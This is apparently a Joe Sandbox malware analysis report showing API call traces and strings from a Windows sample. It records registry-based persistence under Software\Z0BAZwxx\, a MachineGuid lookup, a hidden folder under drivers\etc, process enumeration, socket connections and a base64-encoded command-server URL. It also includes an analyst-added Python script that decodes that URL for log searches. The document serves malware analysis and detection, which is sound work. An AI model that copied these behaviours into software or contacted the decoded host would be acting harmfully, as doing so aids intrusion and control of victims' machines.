                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset$Value$AllocHandleModuleOpenQuerySleepVirtual_beginthreadex_endthreadexwsprintf
                                                                                                                                                                                                                                                                                            • String ID: 5.1$NONE$\S
                                                                                                                                                                                                                                                                                            • API String ID: 3580284329-1620626971
                                                                                                                                                                                                                                                                                            • Opcode ID: 70db6fbd4819d20750c55d5daf8ded0cd093b88732e01a00c4987eab7d4a68c2
                                                                                                                                                                                                                                                                                            • Instruction ID: 6f4def9776e3144b4e91abccb01f71e6dadc73255ed4a105e5b1a4fa84ed437c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70db6fbd4819d20750c55d5daf8ded0cd093b88732e01a00c4987eab7d4a68c2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03B1C671900214A6CB20DBA59885DEFBBB9FF95360F25403BF408F7291EA785D41C7AE

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: wcstok$wcscpywcslen
• String ID: aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=$enter$success
• API String ID: 167661103-1147737276
• Opcode ID: 92f076d9bee80c38dce688214b59da554e15b5bf1f6aeb1616af7e9711dd9330
• Instruction ID: 5e2ea09061ae17bc0837542cf5ed6214d01f139d59b08546becc52b18c271b2c
• Opcode Fuzzy Hash: 92f076d9bee80c38dce688214b59da554e15b5bf1f6aeb1616af7e9711dd9330
• Instruction Fuzzy Hash: 5E316071D08209ABDF04BBA1DD46A9EBBB8EF40318F11407FF440762D2DB795E158B99

Control-flow Graph

APIs
  • Part of subcall function 00404C17: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,004079DA,8EB39475,?,?,?), ref: 00404C34
  • Part of subcall function 0040740F: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,004079E1,8EB39475,?), ref: 00407421
  • Part of subcall function 0040740F: GetProcAddress.KERNEL32(00000000), ref: 00407428
  • Part of subcall function 0040740F: IsWow64Process.KERNEL32(00000000,00000000,?,?,004079E1,8EB39475,?), ref: 0040744C
  • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
• RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,?,00000000,?,?,?), ref: 00407A14
• RegQueryValueExW.KERNELBASE(00000000,MachineGuid,00000000,00000000,00000000,00000050), ref: 00407A41
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: AddressAllocHandleLibraryLoadModuleOpenProcProcessQueryValueVirtualWow64
• String ID: %ls$FAILED$MachineGuid$P$Software\Microsoft\Cryptography
• API String ID: 3971681081-1270531343
• Opcode ID: 9493e2a87521952e1b55b8ebdcf98532706999c6ec7bc5287e8c71087c8d8ef6
• Instruction ID: ee9aa70cf1c74c907f64db88cc71ebfd1588477c17623781f346bcce0a6afabf
• Opcode Fuzzy Hash: 9493e2a87521952e1b55b8ebdcf98532706999c6ec7bc5287e8c71087c8d8ef6
• Instruction Fuzzy Hash: 6811E672E44318BAEB10A7A5DC47F9E7B648F00759F31003BF645791C2DABC5A409AAD

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph rendered as an image in the original report; only the block list survives extraction.] Function 0x40887b-0x40899e: entry block 40887b-4088ae calls 402c68, 404c49, 402c68 and 404c49; blocks 4088b4-40890b run strstr five times (4088c0, 4088d4, 4088eb, 4088f6, 408903); block 408941-408981 calls 404b15 twice and then atoi; both paths release through 404c38 (408911 and 408983) before the return at 40898b-40899e.
APIs
  • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
• strstr.MSVCRT ref: 004088C0
• strstr.MSVCRT ref: 004088D4
• strstr.MSVCRT ref: 004088EB
• strstr.MSVCRT ref: 004088F6
• strstr.MSVCRT ref: 00408903
• atoi.MSVCRT(?,?,00000000,00000000,?,00000001,00000000), ref: 00408975
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: strstr$AllocVirtualatoi
• String ID: ://$https://
• API String ID: 571728614-1779917511
• Opcode ID: 7cbbc6e2f48da071cbbc83c7112badd04bd626e784661ccb55c408bfa4ad93c4
• Instruction ID: cf151f61cd9de4b96e27ac18cb58804d0dc6bef225bff225e8e7c86b513dcab6
• Opcode Fuzzy Hash: 7cbbc6e2f48da071cbbc83c7112badd04bd626e784661ccb55c408bfa4ad93c4
• Instruction Fuzzy Hash: FB31C371A08205EBDB10AFA9CE85A6E7BA8DF80314F14017FF844B72D1DE389D008A59
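The two pieces of this fragment that an analyst will want to check by hand are the base64 string passed around in the GetModuleHandleW call trace and the string-splitting function at 0x40887b, whose only library calls are five strstr lookups against "://" and "https://" followed by one atoi. The example below is added here and is not part of the Joe Sandbox report or of the sample's recovered code: it decodes the observed base64 string offline and splits the result into scheme, host, port and path the way that strstr/atoi sequence suggests (scheme via "://", TLS via the "https://" prefix, port via atoi of an optional ":NNN", default 80/443). The field layout and the default-port rule are the analyst's assumption about that function, not something the report states, and whether the decoded URL is ever contacted is a question for the report's network section, not this fragment.

```python
"""
Added example (not from the Joe Sandbox report or the sample): decode the
base64 string seen in the call trace and split the resulting URL in the
shape the strstr("://") / strstr("https://") / atoi sequence at 0x40887b
suggests. The field layout is an analyst's assumption, not recovered code.
"""
import base64
from dataclasses import dataclass

# Copied verbatim from the report's GetModuleHandleW call trace.
OBSERVED_B64 = "aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA="


@dataclass(frozen=True)
class Endpoint:
    scheme: str
    host: str
    port: int
    path: str
    tls: bool


def decode_b64_string(blob: str) -> str:
    """Strict base64 decode; a mistyped indicator raises instead of yielding junk."""
    return base64.b64decode(blob, validate=True).decode("ascii")


def atoi(text: str) -> int:
    """atoi-style parse: leading decimal digits only, 0 when there are none
    (sign handling deliberately omitted, ports are never negative)."""
    digits = ""
    for ch in text.strip():
        if not ch.isdigit():
            break
        digits += ch
    return int(digits) if digits else 0


def split_url(url: str) -> Endpoint:
    """Scheme is whatever precedes '://'; TLS iff that scheme is https;
    an optional ':NNN' after the host is read atoi-style; the default port
    (80 or 443) is the assumed behaviour when no port is present."""
    sep = url.find("://")
    if sep < 0:
        # No scheme marker: treat the whole string as host[:port][/path] over plain HTTP.
        scheme, rest = "http", url
    else:
        scheme, rest = url[:sep].lower(), url[sep + 3:]
    tls = scheme == "https"
    slash = rest.find("/")
    hostport, path = (rest, "/") if slash < 0 else (rest[:slash], rest[slash:])
    host, _, port_text = hostport.partition(":")
    port = atoi(port_text) if port_text else (443 if tls else 80)
    return Endpoint(scheme, host, port, path, tls)


def endpoint_from_report() -> Endpoint:
    """Decode the observed string and split it; this is the value to pivot on."""
    return split_url(decode_b64_string(OBSERVED_B64))


if __name__ == "__main__":
    print(decode_b64_string(OBSERVED_B64))
    print(endpoint_from_report())
```

Running the block prints the decoded URL and the split endpoint; the host and path are the indicators worth searching for in proxy and DNS logs, while the port and TLS fields come from the assumed default rule and should be confirmed against the report's network section before being used in a blocking rule.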

Control-flow Graph (rendered graph omitted; basic blocks span 40547f-405579)
APIs
• memset.MSVCRT ref: 004054A6
• memset.MSVCRT ref: 004054BC
• _beginthreadex.MSVCRT ref: 004054E1
• _beginthreadex.MSVCRT ref: 004054ED
• clock.MSVCRT ref: 004054F8
  • Part of subcall function 004083D7: memset.MSVCRT ref: 004083FA
  • Part of subcall function 004083D7: RegOpenKeyExW.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00020019,00405503,?,?,76E86C30,76EB0460), ref: 0040842D
• _beginthreadex.MSVCRT ref: 00405531
• clock.MSVCRT ref: 0040555C
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: _beginthreadexmemset$clock$Open
• String ID:
• API String ID: 279234960-0
• Opcode ID: 757b067a59ce54d03419b4fde3b6e820a4f7c257bf3eaeaed28cdf6ec6612a81
• Instruction ID: 28a8490cb83bf233721ee0c2fbe66ac0b832dc45bff05d28b36ec78ff7895cbe
• Opcode Fuzzy Hash: 757b067a59ce54d03419b4fde3b6e820a4f7c257bf3eaeaed28cdf6ec6612a81
• Instruction Fuzzy Hash: E821A47681035466D330AB7A9D49D5F7AACEFC5B04F000A3EF994F61D1E6389D048AAE

Control-flow Graph (rendered graph omitted; basic blocks span 405211-405342)
APIs
  • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
• memset.MSVCRT ref: 00405246
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00405268
• _beginthreadex.MSVCRT ref: 004052EF
• Sleep.KERNELBASE(0000000A), ref: 00405308
• Process32NextW.KERNEL32(?,0000022C), ref: 00405322
• Sleep.KERNELBASE(2FA62CA8), ref: 00405340
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: Sleep$AllocCreateNextProcess32SnapshotToolhelp32Virtual_beginthreadexmemset
• String ID:
• API String ID: 366437478-0
• Opcode ID: 98e7c753959bd9781fafd7c1d3a0c6740d4bf29403812687b81d8c12dc28b4e6
• Instruction ID: d859c7a432dee83c2016690f348989724e2ad2523fa05cc59ebe0d2977a90f8f
• Opcode Fuzzy Hash: 98e7c753959bd9781fafd7c1d3a0c6740d4bf29403812687b81d8c12dc28b4e6
• Instruction Fuzzy Hash: F531E8708007046EEB206BB5DC49D6F76A8EF41704F2005BFF455F61C1DA7C9E519E2A

Control-flow Graph (rendered graph omitted; basic blocks span 4083d7-408480)
APIs
• memset.MSVCRT ref: 004083FA
• RegOpenKeyExW.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00020019,00405503,?,?,76E86C30,76EB0460), ref: 0040842D
• RegQueryValueExW.KERNELBASE(00405503,0040D114,00000000,00000000,?,00000208,00000000,?,?,76E86C30,76EB0460), ref: 00408469
• _wtoi.MSVCRT(?,?,76E86C30,76EB0460), ref: 00408477
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: OpenQueryValue_wtoimemset
• String ID: Software\Z0BAZwxx\
• API String ID: 4215520229-1921705251
• Opcode ID: d35f9aaef82a7263d78094d1875e815b9ecbdfa7ab8d4cae31d9eb612996cd93
• Instruction ID: 403f48811edb898ac64ce0cb546cf93d896c61d9ac6bab7e0d6e5cdb7f2ab47a
• Opcode Fuzzy Hash: d35f9aaef82a7263d78094d1875e815b9ecbdfa7ab8d4cae31d9eb612996cd93
• Instruction Fuzzy Hash: 84110876A002187AD720A7F4DC89FEF776CDF08794F10057EB615F21C2EAB49A4486A8
APIs
  • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
• SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B), ref: 00402E3B
• PathAppendW.SHLWAPI(00000000,00408038,?,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E5C
• CreateDirectoryW.KERNEL32(00000000,00000000,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E65
• SetFileAttributesW.KERNEL32(00000000,00000006,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E72
• PathAppendW.SHLWAPI(00000000,00407E9B,?,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E7C
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: Path$Append$AllocAttributesCreateDirectoryFileFolderVirtual
• String ID:
• API String ID: 3172642931-0
• Opcode ID: c5e1bd7d6f7390fb55f19be4e07d281718f0cd768bfe92574383bb54c8130788
• Instruction ID: 2206e7899cb27381e583c61225154ca2b14266176ec61f989d91304320a3329e
• Opcode Fuzzy Hash: c5e1bd7d6f7390fb55f19be4e07d281718f0cd768bfe92574383bb54c8130788
• Instruction Fuzzy Hash: 2BF0A472284108BFEB016FB1AE88D7F3B6CDB95759700413AFA04BA1C1CA798C0597B9
APIs
• RegCreateKeyExW.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00000000,00000000,000F003F,00000000,004054CD,00000000,00000000,?,?,00408B62,0040CF00,00000000), ref: 00408744
• wcslen.MSVCRT ref: 0040874F
  • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
• RegSetValueExW.KERNELBASE(004054CD,?,00000000,00000001,00408038,00000000,?,?,00408B62,0040CF00,00000000,?,00000000,?,?,00407E96), ref: 00408776
  • Part of subcall function 00401050: RegCloseKey.KERNELBASE(ez@,?,00407A65,00000000), ref: 00401064
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCreateLibraryLoadValuewcslen
                                                                                                                                                                                                                                                                                            • String ID: Software\Z0BAZwxx\
                                                                                                                                                                                                                                                                                            • API String ID: 3357561725-1921705251
                                                                                                                                                                                                                                                                                            • Opcode ID: 763f5e605f40beb979aac3107c7bd6545b20bc5e90c6ea7a0af4e7224afad282
                                                                                                                                                                                                                                                                                            • Instruction ID: 70255b9e219390e924199528c16af05d9f3be5b7d2994cc30a7ddb2fe8e5f02d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 763f5e605f40beb979aac3107c7bd6545b20bc5e90c6ea7a0af4e7224afad282
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F01D636140204BEEB205B56ED4AEEF3BA8CBC5B60F20412EFA05B60C1D9B55E41E668
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004085DF
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00000001,?,?,?,?,00000000), ref: 00408605
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,00000104,00000000,?,00000000,00000104,?,?,?,00000000), ref: 00408631
                                                                                                                                                                                                                                                                                              • Part of subcall function 00401050: RegCloseKey.KERNELBASE(ez@,?,00407A65,00000000), ref: 00401064
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseLibraryLoadOpenQueryValuememset
                                                                                                                                                                                                                                                                                            • String ID: Software\Z0BAZwxx\
                                                                                                                                                                                                                                                                                            • API String ID: 79794857-1921705251
                                                                                                                                                                                                                                                                                            • Opcode ID: 9aebf5d51083ea0474c8114bcbbfa8aa5e9af85ba3a0213b63bf12f4be191991
                                                                                                                                                                                                                                                                                            • Instruction ID: d4a4179242a07c87cd33e05e147c6bacc52d52a803263cec572c3a269d048f28
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9aebf5d51083ea0474c8114bcbbfa8aa5e9af85ba3a0213b63bf12f4be191991
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7401C072800218B6DB25A7A4CC07FDE7B689B15714F1000AEF655B60C1EAB49B84CA98
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B), ref: 00402E3B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: PathAppendW.SHLWAPI(00000000,00408038,?,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E5C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: CreateDirectoryW.KERNEL32(00000000,00000000,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E65
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: SetFileAttributesW.KERNEL32(00000000,00000006,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E72
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: PathAppendW.SHLWAPI(00000000,00407E9B,?,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E7C
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,00407E9B,00408038,?,004054CD), ref: 0040776D
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,00407E9B,00408038,?,004054CD), ref: 00407781
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Path$AppendCreateFile$AttributesCloseDirectoryFolderHandle
                                                                                                                                                                                                                                                                                            • String ID: drivers\etc$protocol
                                                                                                                                                                                                                                                                                            • API String ID: 3677764628-3772225760
                                                                                                                                                                                                                                                                                            • Opcode ID: d2a4bdb490bef126160427d97cb39f259e7dc4ee22fdfc36632ad028c34fc121
                                                                                                                                                                                                                                                                                            • Instruction ID: 8b8cd05857f767f478aa3daa326e7e21353036edafc4fd69df6466da4ba73d61
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2a4bdb490bef126160427d97cb39f259e7dc4ee22fdfc36632ad028c34fc121
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CE0A9A16C53143AE42033B49CC6FAB118D8B02398F22173BF222B22C2D9BD6D0400AE
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: wcslen
                                                                                                                                                                                                                                                                                            • String ID: %02X
                                                                                                                                                                                                                                                                                            • API String ID: 4088430540-436463671
                                                                                                                                                                                                                                                                                            • Opcode ID: e6349d7566e542de323579e62f566403a0460e1df081866f0ad2c3d872dac581
                                                                                                                                                                                                                                                                                            • Instruction ID: c04b32fe9950897e0f48e7dafadec2ca4b3f8658286846603aa18106c8baca47
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6349d7566e542de323579e62f566403a0460e1df081866f0ad2c3d872dac581
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6211B4B1A002119ADB205F949B8566EB7F49F05754B24043FF981F73C1EA3C9D418A5D
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004010CE: socket.WS2_32(00000002,00000001,00000006,004071EE,00000000,00408E7E,?,00407F38,00000000,00000000), ref: 004010E2
                                                                                                                                                                                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00001006,00007530,00000004,00000000,00408E7E,?,00407F38,00000000), ref: 00407223
                                                                                                                                                                                                                                                                                            • connect.WS2_32(00000000,?,00000010), ref: 00407264
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: connectsetsockoptsocket
                                                                                                                                                                                                                                                                                            • String ID: 0u
                                                                                                                                                                                                                                                                                            • API String ID: 509303787-3203441087
                                                                                                                                                                                                                                                                                            • Opcode ID: 29fba23696c62b1143cceafd9ad49f96adefe7539ec21bac43d31b0e29538015
                                                                                                                                                                                                                                                                                            • Instruction ID: 54dbe7a96ca21992bb34ae97e2733eb704755e76610b55cb7b51ce060b14f984
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29fba23696c62b1143cceafd9ad49f96adefe7539ec21bac43d31b0e29538015
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6101A1319553157DEA1077B4EC17EBE26108F00B34F20062FFA61BA1C1EEB85A51629A
APIs
  • Part of subcall function 0040878C: RegOpenKeyExW.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00020019,004054CD,00000000,?,?,?,?,00407A8F,00000000,?,0040803E,?), ref: 004087BA
• wcscpy.MSVCRT ref: 00407B10
  • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
• wsprintfW.USER32 ref: 00407AE8
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: AllocOpenVirtualwcscpywsprintf
• String ID: %02d.%02d.%04d
• API String ID: 905796295-188738806
• Opcode ID: d85b4b57414d2b2d69aa4a4c4ee4b35fea69bb81168f1ae07f8b2626323ac57a
• Instruction ID: 144bdd79aa9d3822deb6798b3d944f22a97b9f8a5e4431696abbf6aeb2788a6a
• Opcode Fuzzy Hash: d85b4b57414d2b2d69aa4a4c4ee4b35fea69bb81168f1ae07f8b2626323ac57a
• Instruction Fuzzy Hash: 8D01D8E1544114A6E6207BAADD46A7F32E88EC1B49B05003FF985B72C2EA7C594186BE
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00020019,004054CD,00000000,?,?,?,?,00407A8F,00000000,?,0040803E,?), ref: 004087BA
• RegQueryValueExW.KERNELBASE(004054CD,0040CC4C,00000000,00000000,00000000,?,?,?,?,00407A8F,00000000,?,0040803E,?,?,004054CD), ref: 00408803
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: OpenQueryValue
• String ID: Software\Z0BAZwxx\
• API String ID: 4153817207-1921705251
• Opcode ID: ea8d534bd058ac273b81175436ace048efae155f41b8cd6d2257d95aecc7b931
• Instruction ID: c9e267c1070ec395bb0912e1c45191ba70df067031acd037c9e0f9dad43f8bcd
• Opcode Fuzzy Hash: ea8d534bd058ac273b81175436ace048efae155f41b8cd6d2257d95aecc7b931
• Instruction Fuzzy Hash: FA0184B6650215BAEB24A766DD46F9F76688B80B20F31003FF605B71C1DDB89A41916C
APIs
  • Part of subcall function 004010A2: RegCreateKeyExA.KERNELBASE(80000001,004099F4,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,0040855B,Software\Z0BAZwxx\,00000000,?,?,004099F4), ref: 004010CA
• Sleep.KERNELBASE(0000000A,?,00000000,?,?,?,004099F4), ref: 00408572
  • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
• RegSetValueExA.KERNELBASE(00000000,004099F4,00000000,00000001,0040D10C,00000000,?,?,004099F4), ref: 0040859D
  • Part of subcall function 00401050: RegCloseKey.KERNELBASE(ez@,?,00407A65,00000000), ref: 00401064
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: CloseCreateLibraryLoadSleepValue
• String ID: Software\Z0BAZwxx\
• API String ID: 508966606-1921705251
• Opcode ID: 1507e43ee96fb4c06f7ceee3f7d59e785763dcb903d114485ec9cde194086286
• Instruction ID: 9938723e0093edba29856d576959375a33cfa6f80bfd5a629303d5fda331d746
• Opcode Fuzzy Hash: 1507e43ee96fb4c06f7ceee3f7d59e785763dcb903d114485ec9cde194086286
• Instruction Fuzzy Hash: E6F044266002047AEE1067A6DC47FAE2798DB817A8F20007FF105BA0C1DEB95E4152A8
APIs
  • Part of subcall function 004010A2: RegCreateKeyExA.KERNELBASE(80000001,004099F4,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,0040855B,Software\Z0BAZwxx\,00000000,?,?,004099F4), ref: 004010CA
  • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
• RegSetValueExA.KERNELBASE(00000000,0040D110,00000000,00000001,?,00000000,?,00409B79,?), ref: 004084D9
  • Part of subcall function 00401050: RegCloseKey.KERNELBASE(ez@,?,00407A65,00000000), ref: 00401064
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: CloseCreateLibraryLoadValue
• String ID: Software\Z0BAZwxx\
• API String ID: 4148158921-1921705251
• Opcode ID: 079801fb10b5b25a11377870f1dfc546aa286ea61802b1a6752b3b1cc64841b2
• Instruction ID: 9dd2b46add90bb4c9c695123c47c7fac413969a986b6bfaef1ddb5798ef7d6eb
• Opcode Fuzzy Hash: 079801fb10b5b25a11377870f1dfc546aa286ea61802b1a6752b3b1cc64841b2
• Instruction Fuzzy Hash: 0CF09636500304BAFE20A7A6DC47F9E3798DB81BA4F20007FF505BA0C1DEB9AE41925C
APIs
• RegCloseKey.KERNELBASE(ez@,?,00407A65,00000000), ref: 00401064
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: Close
• String ID: ez@
• API String ID: 3535843008-307298357
• Opcode ID: 76390ae0bed861b0e037cce240818d75561f70313286bc32234e024495660c76
• Instruction ID: 4c84069e2ef98658d5186f5adce7be50019fbdd61ac68ad264a878f959edd915
• Opcode Fuzzy Hash: 76390ae0bed861b0e037cce240818d75561f70313286bc32234e024495660c76
• Instruction Fuzzy Hash: E7B092360843083AEA102AE6FC06A693B0C9B40A75F51046AF60E99492DDB6AAA16088
APIs
  • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
